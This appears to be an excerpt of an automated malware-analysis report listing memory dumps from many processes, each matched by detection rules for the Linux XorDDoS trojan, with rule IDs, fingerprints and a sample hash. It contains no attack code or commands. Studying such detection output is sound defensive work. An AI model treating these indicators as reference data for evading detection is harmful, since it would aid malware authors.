        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
